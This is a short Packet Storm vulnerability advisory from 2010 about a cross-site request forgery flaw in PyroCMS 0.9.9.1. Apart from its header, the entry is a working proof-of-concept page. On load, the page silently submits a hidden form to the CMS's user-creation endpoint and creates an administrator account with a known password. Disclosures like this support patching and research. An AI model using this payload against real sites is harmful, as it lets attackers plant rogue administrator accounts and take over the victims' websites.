PyroCMS 0.9.9.1 Cross Site Request Forgery

2010-07-13T00:00:00
ID PACKETSTORM:91716
Type packetstorm
Reporter AutoSec Tools
Modified 2010-07-13T00:00:00

Description

                                        
                                            `<!------------------------------------------------------------------------  
# Software................PyroCMS 0.9.9.1  
# Vulnerability...........Cross-site Request Forgery  
# Download................http://pyrocms.com/  
# Release Date............7/11/2010  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................John Leitch  
# Site....................http://cross-site-scripting.blogspot.com/  
# Email...................john.leitch5@gmail.com  
# ------------------------------------------------------------------------  
#   
# --Description--  
#   
# A cross-site request forgery vulnerability in PyroCMS 0.9.9.1 can be  
# exploited to create a new admin.  
#   
#   
# --PoC-->  
  
<html>  
<body onload="document.forms[0].submit()">  
<form method="POST" action="http://localhost/pyrocms/index.php/admin/users/create">  
<input type="hidden" name="first_name" value="a" />  
<input type="hidden" name="last_name" value="a" />  
<input type="hidden" name="email" value="new_admin@x.com" />  
<input type="hidden" name="username" value="new_admin" />  
<input type="hidden" name="display_name" value="a" />  
<input type="hidden" name="group" value="admin" />  
<input type="hidden" name="active" value="1" />  
<input type="hidden" name="password" value="Password1" />  
<input type="hidden" name="confirm_password" value="Password1" />  
<input type="hidden" name="btnAction" value="save" />  
</form>  
</body>  
</html>  
`